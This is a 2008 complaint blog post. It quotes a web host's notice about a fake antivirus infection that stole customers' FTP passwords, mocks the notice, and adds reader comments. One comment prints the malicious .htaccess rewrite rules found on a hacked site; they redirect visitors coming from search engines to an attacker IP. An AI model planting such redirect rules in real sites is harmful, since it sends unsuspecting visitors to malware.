26,991 IX Web hosting customers infected

Posted: December 11, 2008 in IX Web Hosting
Tags: , , , , , ,
4

Dear Nicole,

In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our client’s websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website. Any visitors to your website will then be redirected to the fake anti-virus website.

We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.

While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:

1. Uninstall the fake Anti-Virus software by following the instructions at this link:

http://www.bleepingcomputer.com/malware-removal/uninstall-antivirus-2009

2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.

To illustrate the severity of the issue I would like to share some facts with you:

* 26,991 of our customers have been infected with fake Anti-Virus 2009

* 79,469 websites have been spreading the Anti-Virus 2009 infection

 

* 120,923 malicious files have been removed from our system

We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.

If you have questions regarding any of this information, please contact our support team anytime.

Kind Regards,

Fatima Said, CCO

IX Web Hosting

h**p://www.ixwebhosting.com

 

******************************************************

 

shocked

WOW!!!… Let’s break this down..

  • In our ongoing commitment to the security of our customers
    Well at least they have a sense of humor
  • we have discovered a vulnerability located within many of our client’s websites, including yours.
    Actually us customers dicovered this SIX MONTHS AGO!!
  • This is a self replicating virus which is found by visiting well-known search engines
    Hahahaha… so first they blame the customers, now they are blaming all the mayor search engines..
  • At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website.
    Yeahhhh, I know exactly what you are thinking!!.. and Yes it is these idiots that are running IX web hosting … If you believe this, you’ll believe anything.
  • We have dedicated our systems administration team to finding a solution.
    Yeahh Right, thats like trying to get a lead balloon to fly!! 

  • To illustrate the severity of the issue I would like to share some facts with you:

     

        * 26,991 of our customers have been infected with fake Anti-Virus 2009

        * 79,469 websites have been spreading the Anti-Virus 2009 infection

        * 120,923 malicious files have been removed from our system
    What can I say?, 26,991 customers fault.. Ooohh and let’s not forget Google..

     

  • We are proud to say that we are among the first web hosts to identify this particular problem
    What this really means, is they are proud of themselves, for being able to bullshit their customers into thinking it’s the customer and Google’s fault.

     

  • and have been the first to offer a resolution.
    So these incompetent retards, think that blaming others for their incompetence, and wasting their time by having them download junk, and scan their PC … a Resolution??

  • If you have questions regarding any of this information, please contact our support team anytime.
    I think I would rather have someone use my eyeballs  as pin cushions than have to deal with the Notourious IX Web Hosting Support .. thats like tring to wipe your arse with your teeth!!

Comments
  1. Anon IX Customer says:
    December 11, 2008 at 7:51 pm

    My experiences are very similiar to yours – 2 years of clear sailing followed by a year in hell. Unfortunately I made the descion at the begining of summer 08 to start hosting sites for some friends and affiliates. Since that time, its been pure hell. Ive found files from other users, been hacked numerous times and now it seems everything in my webfolders have mysteriously disappeared – all of course my fault. After 100s of hours of pouring over directory structures and editing hacked files, I think Ivce finnaly had enough. Its sad realy, IX used to be a great company to be with. They cared, service was good and the deal even better. Now they are a very sad parody of what they once were. Any suggestions on a better provider?

    – Sad Anon IX Customer –

  2. neverixweb says:
    December 11, 2008 at 8:16 pm

    Sad Anon.
    I know what you are going through, I too was / am hosting other peoples sites with IX web hosting.( in the process of moving them all) What started out as a kind gesture to friends and customers, and recommending IX web hosting, turned into a nightmare, and I became the fireing block.

    What you and everyone else MUST do, is file a complaint against them at the BBB
    and try and get some kind of compensation for your grief.

    You can file a complaint at

    https://odr.bbb.org/odrweb/public/GetStarted.aspx

    Good Luck

  3. Alex says:
    December 24, 2008 at 10:12 am

    IX web hosting is open to hackers, I have had several of my sites hacked at IX web whereby the .htaccess file is re-written to RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    RewriteRule .* http://89.28.13.205/go.php?s=uu1 [R,L]

    This is clearly going to re-route all traffic from any search engines to the Hackers site which I have reported as a malicious IP, in fact if it wasn’t for proxy servers allowing almost invisible traffic re-routing I would ban all Moldovan IP’s as I am pretty sure that I will never get any business from Moldova. The hackers IP site is hosted in Moldova. IX web try blame their clients for the hack saying it is key logger software that causes this problem. ( I boot from a DVD for FTP transactions and don’t even use my computers hard drives, so this possibility is ruled out. No server is invulnerable and IX should at least admit they have a problem.

    If you get the same shabby service from IX I suggest to report them to the Better Business Bureau at https://odr.bbb.org/odrweb/public/GetStarted.aspx as their hacker safe status is laughable and is false advertising.

  4. Syntactically Correct / This Blog Was Hijacked. Shame On IX Web Hosting says:
    January 10, 2009 at 9:40 am

    […] further, I found this post on the IX Web Hosting Warning blog. The writer of the post seems to think, like me, that IX Web […]

Leave a comment